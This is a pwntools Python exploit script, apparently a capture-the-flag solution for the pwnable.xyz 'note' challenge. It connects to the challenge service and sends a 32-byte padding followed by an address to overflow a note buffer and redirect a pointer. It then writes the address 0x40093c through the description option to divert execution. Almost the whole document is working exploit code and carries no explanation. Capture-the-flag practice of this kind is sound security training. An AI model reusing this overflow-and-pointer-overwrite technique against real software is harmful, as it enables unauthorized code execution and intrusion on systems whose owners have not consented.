Exploit
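```python
from pwn import *
import time

context.log_level = 'debug'

p = remote("svc.pwnable.xyz", 30016)
#p = process('./note')
#gdb.attach(p,'''
#break *0x0000000000400a10
#continue
#''')

# Menu option 1: answer the "Note len?" prompt with 38, then send the note.
p.recvuntil(b"> ")
p.sendline(b"1")
p.recvuntil(b"Note len? ")
p.sendline(b"38")
p.recvuntil(b"note: ")
# Padding followed by the little-endian bytes of the address 0x601220.
payload = b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00"
p.sendline(payload)

# Menu option 2: answer the "desc:" prompt with the 8-byte value 0x40093c.
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"desc: ")
p.sendline(b"\x3c\x09\x40\x00\x00\x00\x00\x00")

# Send menu choice 12, then read everything the service returns.
p.recvuntil(b"> ")
p.sendline(b"12")
p.recvall()
p.close()
```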